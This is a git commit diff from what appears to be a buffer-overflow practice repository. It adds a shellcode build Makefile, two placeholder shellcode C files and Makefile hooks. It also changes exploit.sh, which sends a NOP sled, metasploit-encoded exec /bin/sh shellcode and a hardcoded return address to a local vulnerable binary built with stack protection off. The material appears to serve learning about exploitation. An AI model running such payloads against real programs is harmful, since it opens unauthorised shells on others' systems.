diff options
| -rw-r--r-- | Makefile | 8 | ||||
| -rwxr-xr-x | exploit.sh | 5 | ||||
| -rw-r--r-- | shellcode/Makefile | 20 | ||||
| -rw-r--r-- | shellcode/simple.c | 11 | ||||
| -rw-r--r-- | shellcode/simple2.c | 9 |
5 files changed, 50 insertions, 3 deletions
@@ -5,7 +5,10 @@ CFLAGS = -Wall -g OCFLAGS = -m32 -mpreferred-stack-boundary=2 -z execstack -fno-stack-protector TARGETS = $(patsubst %.c,%.o,$(wildcard *.c)) -all: $(TARGETS) post-build +all: shellcode $(TARGETS) post-build + +shellcode: + make -f shellcode/Makefile SUBDIR=shellcode post-build: @read -p "disable protection stuff? (y/N) " answ; \ @@ -28,5 +31,6 @@ disable-prot: clean: $(RM) -f $(patsubst %.o,%,$(TARGETS)) + make -f shellcode/Makefile SUBDIR=shellcode clean -.PHONY: all clean +.PHONY: shellcode all clean @@ -3,6 +3,9 @@ # shellcode generated with metasploit (exec /bin/sh): # ./msfpayload linux/x86/exec cmd=/bin/sh R | ./msfencode -b '\x00\x09\x0a\x0d\x1b\x20' -# 117xNOP (0x90) + shellcode + 117xNOP (0x90) + return addr +# 117xNOP (0x90) + shellcode(70) + 117xNOP (0x90) + return addr ./overflow `python -c 'print "\x90"*117 + "\xd9\xcd\xd9\x74\x24\xf4\xbf\xc9\x14\x15\x14\x5d\x31\xc9\xb1\x0b\x83\xc5\x04\x31\x7d\x16\x03\x7d\x16\xe2\x3c\x7e\x1e\x4c\x27\x2d\x46\x04\x7a\xb1\x0f\x33\xec\x1a\x63\xd4\xec\x0c\xac\x46\x85\xa2\x3b\x65\x07\xd3\x34\x6a\xa7\x23\x6a\x08\xce\x4d\x5b\xbf\x78\x92\xf4\x6c\xf1\x73\x37\x12" + "\x90"*117 + "\x8c\xd3\xff\xff"'` + +# shellcode/simple.c +#./overflow `python -c 'print "\x90"*117 + "\xbb\xd3\x92\x56\xa9\xd9\xca\xd9\x74\x24\xf4\x5a\x31\xc9\xb1\x0f\x31\x5a\x12\x83\xc2\x04\x03\x89\x9c\xb4\x5c\xc6\x5f\x38\x9f\x18\xa0\x39\x9f\x0c\xa0\x39\x9f\x2c\xa0\x39\x9f\x2d\xda\x6b\x9f\x2c\x62\x9c\x9e\x35\x9e\x9b\xa8\xd9\x9f\xa3\xa8\xcd\x9f\xa3\xa8\xf1\x9f\xa3\xa8\xd1\x5f\x5c\x57\xe3\x9f\xa3\xa8\xe3\x9f\xa3\xa8\xe3\x9f\xa3\xa8" + "\x90"*104 + "\x8c\xd3\xff\xff"'` diff --git a/shellcode/Makefile b/shellcode/Makefile new file mode 100644 index 0000000..c35111d --- /dev/null +++ b/shellcode/Makefile @@ -0,0 +1,20 @@ +RM := rm +CC := gcc +LD := ld +OBJCOPY := objcopy +CFLAGS = -c -Wall -fpic -Os +LDFLAGS = +SUBDIR ?= . +TARGETS = $(patsubst %.c,%.o,$(wildcard $(SUBDIR)/*.c)) + +all: $(TARGETS) + +%.o : %.c + $(CC) $(CFLAGS) -o $@ $< + $(LD) $(LDFLAGS) -N -Ttext 0x0 -e _start -Map $(patsubst %.o,%.map,$@) $@ -o $(patsubst %.o,%,$@) + $(OBJCOPY) -R .note -R .comment -S -O binary $(patsubst %.o,%,$@) $(patsubst %.o,%.bin,$@) + +clean: + $(RM) -f $(patsubst %.o,%.map,$(TARGETS)) $(patsubst %.o,%.bin,$(TARGETS)) $(patsubst %.o,%,$(TARGETS)) $(TARGETS) + +.PHONY: all clean diff --git a/shellcode/simple.c b/shellcode/simple.c new file mode 100644 index 0000000..bf2bf43 --- /dev/null +++ b/shellcode/simple.c @@ -0,0 +1,11 @@ +/* + * gcc -c -Wall -fpic -Os shellcode.c -o shellcode.o + * ld -N -Ttext 0x0 -e _start -Map shellcode.map shellcode.o -o shellcode + * objcopy -R .note -R .comment -S -O binary shellcode shellcode.bin + */ + +int _start(void) { + while (1) { + } + return (0); +} diff --git a/shellcode/simple2.c b/shellcode/simple2.c new file mode 100644 index 0000000..341b2de --- /dev/null +++ b/shellcode/simple2.c @@ -0,0 +1,9 @@ +#include <stdio.h> +#include <stdlib.h> + +int _start(void) { + while (1) { + //printf("Shellcode!\n"); + } + return (0); +} |